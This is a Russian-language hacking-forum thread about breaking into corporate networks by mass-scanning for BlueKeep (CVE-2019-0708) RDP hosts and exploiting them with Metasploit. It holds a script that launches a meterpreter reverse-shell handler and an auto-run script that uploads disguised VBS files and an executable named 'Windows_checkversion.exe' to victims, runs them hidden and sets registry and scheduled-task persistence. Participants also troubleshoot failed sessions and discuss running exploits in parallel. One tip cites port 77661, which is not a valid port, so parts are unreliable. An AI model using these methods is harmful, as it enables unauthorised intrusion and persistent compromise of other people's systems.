Статья Добываем доступы в корпы через паблик RCE

[sab0tag3]

если ставить стандартный порт и в masscan -> RDP Recognizer -> rdpscan -> выходит нормально так уязвимых. но ни один не эксплоитируется.
с рандомными портами вообще ниче не находит

еа все одна и та же ошибка

Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError

 

[boriselcin]

Так там в начале же проверяется на уязвимость сканером при запуске эксплойта, далее или отбой или эксплойтит

я писал что проверка в метасплойте не работает должным образом, и поэтому специально указал на сканер который проверяет на уязвимые

 

[SenctumSempra]

я писал что проверка в метасплойте не работает должным образом, и поэтому специально указал на сканер который проверяет на уязвимые

Он тоже криво работает) Либо я его не совсем понял
Поставил я порт рандомный - 31215 , масскан нашел 100к
Засунул в рдпскан - 50к уязвимых говорит
Прошелся реко - 0 хостов с открытым рдп по данному порту

 

[Cam_no_cebe]

Он тоже криво работает) Либо я его не совсем понял
Поставил я порт рандомный - 31215 , масскан нашел 100к
Засунул в рдпскан - 50к уязвимых говорит
Прошелся реко - 0 хостов с открытым рдп по данному порту

согласен, рдпскан как то некоректно работает

 

[kamzzzzz]

если ставить стандартный порт и в masscan -> RDP Recognizer -> rdpscan -> выходит нормально так уязвимых. но ни один не эксплоитируется.
с рандомными портами вообще ниче не находит

еа все одна и та же ошибка

Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError

у меня эта ошибка вылетает в 80% случаях повторного поключения к жертве, после успешного, фиксится чисткой pl, для новичков, прогрузкой другой полезной нагрузки с последующим закреплением, дабы не упираться в дрочево, либо ребутом (для отбитых и ленивых) перед отключением метерпретера, но в целом данная ошибка говорит о том, что подключение прошло, но обратную связь жертва не дает, чаще всего по причине того что порт был уже атакован по 3389 и в системе есть закрепленный пейлоад (это я говорю отсебятину по своему опыту), скорее всего теми, кто юзает masscan-recognizer-rdpscan-p3389.

 

[Cyc199_77]

I get this error in 80% of cases of repeated connection to the victim, after successful, it is fixed by cleaning pl, for beginners, loading another payload with subsequent fixing, so as not to run into drochevo, or reboot (for the repulsed and lazy) before disconnecting the meter, but in general, this error indicates that the connection was successful, but the victim does not give feedback, most often due to the fact that the port was already attacked by 3389 and there is a fixed payload in the system (I say this as a gag from my own experience), most likely those using masscan-recognizer-rdpscan-p3389.

[CODE = html] Exploit failed: Msf :: Exploit :: Remote :: RDP :: RdpCommunicationError Msf :: Exploit :: Remote :: RDP :: RdpCommunicationError [/ CODE]

this error occurs when youre payload cant connect back to youre handler , run wireshark during the expoloit , it helps to find out the exact problem ,and try to use a diffrent payload , cobalt beacon or any other .

 

[boriselcin]

согласен, рдпскан как то некоректно работает

все работает корректно, просто нужно туда после реко засовывать а не наоборот

 

[DrSleep]

В мультипоток MSF можно без костылей запустить?Есть пару идей, но мб все проще чем мне кажется.

 

[boriselcin]

В мультипоток MSF можно без костылей запустить?Есть пару идей, но мб все проще чем мне кажется.т

ты этот exp в мультипоток никак не запустишь, так как он шлет 50-100-200 для заспамки канала. 2 потока это 400мб 3 потока ну ты понял да?)

 

[DrSleep]

ты этот exp в мультипоток никак не запустишь, так как он шлет 50-100-200 для заспамки канала. 2 потока это 400мб 3 потока ну ты понял да?)

В потоков 3-5 можно попробовать.Поднять один листенер на разные порты, разбить базу IP на части равные потокам,через tmux в паре окон запустить само выполнение сплойта к разным файлам IP.Еще не проверял, но может получиться.Нагрузк конечно немаленькая на серв, но все веселей будет.

 

[boriselcin]

В потоков 3-5 можно попробовать.Поднять один листенер на разные порты, разбить базу IP на части равные потокам,через tmux в паре окон запустить само выполнение сплойта к разным файлам IP.Еще не проверял, но может получиться.Нагрузк конечно немаленькая на серв, но все веселей будет.

будет нагрузка на канал нормальная, не скажу что там именно на озу и проц она будет большой

 

[DrSleep]

будет нагрузка на канал нормальная, не скажу что там именно на озу и проц она будет большой

Сам MSF тож грузит )Еще дополнение небольшой, чтобы каждый раз недрочитьс с запуском листенера, достаточно

touch msf_listener_run.sh
echo 'msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp_rc4;set EXITFUNC thread; set LHOST 127.1.1.1; set LPORT 1234;set RC4PASSWORD 55555555;set ExitOnSession 0;setg SessionLogging y;setg loglevel 1;run -j"' > msf_listener_run.sh
sh msf_listener_run.sh

Аналогично для самого сплойта можно сделать.Так же можно добавить автовыполнение скрипта при получении сессии

set AutoRunScript /root/autostart

В автостарт что то наподобии

framework.sessions.each_pair do |sid,s|
thost = s.tunnel_peer.split(":")[0]
if s.ext.aliases['stdapi']
result = cmd_exec("cmd.exe /c if exist %appdata%/svchost.vbs echo 1")
if result == ''
s.console.run_single("cd %appdata%")
s.console.run_single("upload /root/svchost.vbs %appdata%//svchost.vbs")
s.console.run_single("upload /root//ld.vbs %appdata%//ld.vbs")
s.console.run_single("execute -f 'cmd.exe /C %appdata%/svchost.vbs -i -H'")
s.console.run_single("execute -f 'cmd.exe /C %appdata%/ld.vbs -i -H'")
print_status ("Registry and schtasks installed")
s.console.run_single("upload //final_result.exe %appdata%//Windows_checkversion.exe")
s.console.run_single("execute -f Windows_checkversion.exe -H")
sleep (10)
s.console.run_single("rm ld.vbs")
end
end
#
end

 

[BlackCat46]

подскажите, по какой причине не летят сессии на handler ?
делал все по настройкам, ип ВПС-ки установлена убунта, порты пробовал разные 2222,4444,1212,1313 думал может пароль не катит и тоже пробовал всякие разные но сессии не летят. что может быть ? сменить хостера или нужно взять выделенный сервак ?

Посмотреть вложение 17368
Посмотреть вложение 17369

ты попробывал другой хост?

 

[DrSleep]

Попробуй порт 77661 в LPORT прописать, этот порт всегда открыт на VPS и сессии летят на него отлично всегда.

 

[BlackBet]

Спасибо огромное!

перезалей плиз

 

[Santyago08]

Быстрый сканер уязвимости CVE-2019-0708 «BlueKeep».

https://github.com/robertdavidgraham/rdpscan

 

[nadgafilievaliogli]

Перезалейте видос пожалуйста

 

[pinakoladaboy]

кто получал сессии можете отписать в лс плиз ?

 

[DrSleep]

Пиши тут свои траблы.Я получал n кол-во сессий

 

[pinakoladaboy]

Пиши тут свои траблы.Я получал n кол-во сессий

не идут сессии делаю все как тут описывается только не 2 vps а 1 могу скинуть айпи попробуешь у себя